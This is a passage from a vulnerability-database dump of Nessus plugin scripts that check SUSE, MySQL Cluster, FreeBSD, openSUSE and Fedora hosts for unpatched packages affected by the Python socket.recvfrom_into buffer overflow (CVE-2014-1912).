reference:\"python-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"python-base-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"python-curses-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"python-devel-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"python-tk-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"python-xml-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libpython2_6-1_0-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libpython2_6-1_0-32bit-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"python-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"python-base-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"python-base-32bit-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"python-curses-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"python-devel-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"python-tk-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"python-xml-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libpython2_6-1_0-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"python-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"python-base-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"python-curses-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"python-demo-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"python-doc-2.6-8.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"python-doc-pdf-2.6-8.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"python-gdbm-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"python-idle-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"python-tk-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"python-xml-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libpython2_6-1_0-32bit-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"python-32bit-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"python-base-32bit-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libpython2_6-1_0-32bit-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"python-32bit-2.6.9-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"python-base-32bit-2.6.9-0.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:28:08", "references": ["http://www.nessus.org/u?50229a1a", "http://www.nessus.org/u?32fa85d0"], "pluginID": "101811", "description": "The version of MySQL Cluster running on the remote host is 7.3.x prior\nto 7.3.6. It is, therefore, affected by an overflow condition in the\nCLSTCONF component, specifically in the Python sock_recvfrom_into()\nfunction within file Modules/socketmodule.c, due to improper\nvalidation of user-supplied input when checking boundaries. An\nunauthenticated, remote attacker can exploit this, via a specially\ncrafted string, to cause a denial of service condition or the\nexecution of arbitrary code.", "edition": 12, "reporter": "Tenable", "published": "2017-07-19T00:00:00", "title": "MySQL Cluster 7.3.x < 7.3.6 CLSTCONF RCE (July 2017 CPU)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Databases", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-07-17T00:00:00", "cpe": ["cpe:/a:oracle:mysql_cluster"], "id": "MYSQL_CLUSTER_7_3_6.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=101811", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101811);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/17 12:00:06\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_xref(name:\"EDB-ID\", value:\"31875\");\n\n script_name(english:\"MySQL Cluster 7.3.x < 7.3.6 CLSTCONF RCE (July 2017 CPU)\");\n script_summary(english:\"Checks the MySQL Cluster version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MySQL Cluster running on the remote host is 7.3.x prior\nto 7.3.6. It is, therefore, affected by an overflow condition in the\nCLSTCONF component, specifically in the Python sock_recvfrom_into()\nfunction within file Modules/socketmodule.c, due to improper\nvalidation of user-supplied input when checking boundaries. An\nunauthenticated, remote attacker can exploit this, via a specially\ncrafted string, to cause a denial of service condition or the\nexecution of arbitrary code.\");\n # http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?50229a1a\");\n # https://dev.mysql.com/doc/relnotes/mysql-cluster/7.3/en/mysql-cluster-news-7-3-6.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?32fa85d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Cluster version 7.3.6 or later as referenced in the\nJuly 2017 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_cluster\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'Cluster', fixed:'7.3.6', min:'7.3', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:18:04", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1062370", "https://mail.python.org/pipermail/python-dev/2014-February/132758.html", "https://bugs.python.org/issue20246", "http://www.nessus.org/u?6792d6b5"], "pluginID": "72768", "description": "Vincent Danen via Red Hat Issue Tracker reports :\n\nA vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code.\n\nThis vulnerable function, socket.recvfrom_into(), was introduced in\nPython 2.5. Earlier versions are not affected by this flaw.", "edition": 9, "reporter": "Tenable", "published": "2014-03-03T00:00:00", "title": "FreeBSD : Python -- buffer overflow in socket.recvfrom_into() (8e5e6d42-a0fa-11e3-b09a-080027f2d077)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-11-21T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:python27", "p-cpe:/a:freebsd:freebsd:python31", "p-cpe:/a:freebsd:freebsd:python32", "p-cpe:/a:freebsd:freebsd:python33"], "id": "FREEBSD_PKG_8E5E6D42A0FA11E3B09A080027F2D077.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72768", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72768);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/21 10:46:31\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n\n script_name(english:\"FreeBSD : Python -- buffer overflow in socket.recvfrom_into() (8e5e6d42-a0fa-11e3-b09a-080027f2d077)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vincent Danen via Red Hat Issue Tracker reports :\n\nA vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code.\n\nThis vulnerable function, socket.recvfrom_into(), was introduced in\nPython 2.5. Earlier versions are not affected by this flaw.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mail.python.org/pipermail/python-dev/2014-February/132758.html\"\n );\n # http://bugs.python.org/issue20246\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.python.org/issue20246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062370\"\n );\n # https://vuxml.freebsd.org/freebsd/8e5e6d42-a0fa-11e3-b09a-080027f2d077.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6792d6b5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:python27\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:python31\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:python32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:python33\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"python27<=2.7.6_3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"python31<=3.1.5_10\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"python32<=3.2.5_7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"python33<=3.3.3_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:18:54", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=863741", "https://lists.opensuse.org/opensuse-updates/2014-04/msg00035.html"], "pluginID": "75320", "description": "This python updated fixes the following security issue :\n\n - bnc#863741: Fixed potential buffer overflow in\n socket.recvfrom_into (CVE-2014-1912).", "edition": 8, "reporter": "Tenable", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : python (openSUSE-SU-2014:0518-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:python-curses-debuginfo", "p-cpe:/a:novell:opensuse:python-base-debuginfo-32bit", "cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:python-idle", "p-cpe:/a:novell:opensuse:python-curses", "p-cpe:/a:novell:opensuse:python-32bit", "p-cpe:/a:novell:opensuse:python-gdbm-debuginfo", "p-cpe:/a:novell:opensuse:python-base-debuginfo", "p-cpe:/a:novell:opensuse:python-debuginfo", "p-cpe:/a:novell:opensuse:python-gdbm", "p-cpe:/a:novell:opensuse:python-base", "p-cpe:/a:novell:opensuse:python-xml-debuginfo", "p-cpe:/a:novell:opensuse:python-tk-debuginfo", "p-cpe:/a:novell:opensuse:libpython2_7-1_0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libpython2_7-1_0-32bit", "p-cpe:/a:novell:opensuse:python", "p-cpe:/a:novell:opensuse:python-debugsource", "p-cpe:/a:novell:opensuse:libpython2_7-1_0", "p-cpe:/a:novell:opensuse:python-base-debugsource", "p-cpe:/a:novell:opensuse:python-xml", "p-cpe:/a:novell:opensuse:python-tk", "p-cpe:/a:novell:opensuse:python-base-32bit", "p-cpe:/a:novell:opensuse:libpython2_7-1_0-debuginfo", "p-cpe:/a:novell:opensuse:python-debuginfo-32bit", "p-cpe:/a:novell:opensuse:python-doc-pdf", "p-cpe:/a:novell:opensuse:python-demo", "p-cpe:/a:novell:opensuse:python-devel"], "id": "OPENSUSE-2014-289.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=75320", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-289.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75320);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/10 11:50:01\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n\n script_name(english:\"openSUSE Security Update : python (openSUSE-SU-2014:0518-1)\");\n script_summary(english:\"Check for the openSUSE-2014-289 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This python updated fixes the following security issue :\n\n - bnc#863741: Fixed potential buffer overflow in\n socket.recvfrom_into (CVE-2014-1912).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=863741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-04/msg00035.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython2_7-1_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython2_7-1_0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython2_7-1_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython2_7-1_0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-curses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-curses-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-gdbm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-gdbm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-idle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-tk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-xml-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libpython2_7-1_0-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libpython2_7-1_0-debuginfo-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-base-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-base-debuginfo-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-base-debugsource-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-curses-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-curses-debuginfo-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-debuginfo-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-debugsource-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-demo-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-devel-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-doc-pdf-2.7-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-gdbm-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-gdbm-debuginfo-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-idle-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-tk-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-tk-debuginfo-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-xml-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-xml-debuginfo-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-32bit-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-debuginfo-32bit-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python-32bit-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python-base-32bit-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python-base-debuginfo-32bit-2.7.3-10.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python-debuginfo-32bit-2.7.3-10.12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpython2_7-1_0 / libpython2_7-1_0-32bit / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:18:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1062370", "https://bugs.python.org/issue20246", "http://www.nessus.org/u?df10387d"], "pluginID": "72523", "description": "Buffer overflow fix.\n\nSee upstream issue: http://bugs.python.org/issue20246\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 8, "reporter": "Tenable", "published": "2014-02-17T00:00:00", "title": "Fedora 20 : python-2.7.5-10.fc20 (2014-2394)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-11-20T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:python"], "id": "FEDORA_2014-2394.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72523", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-2394.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72523);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_xref(name:\"FEDORA\", value:\"2014-2394\");\n\n script_name(english:\"Fedora 20 : python-2.7.5-10.fc20 (2014-2394)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Buffer overflow fix.\n\nSee upstream issue: 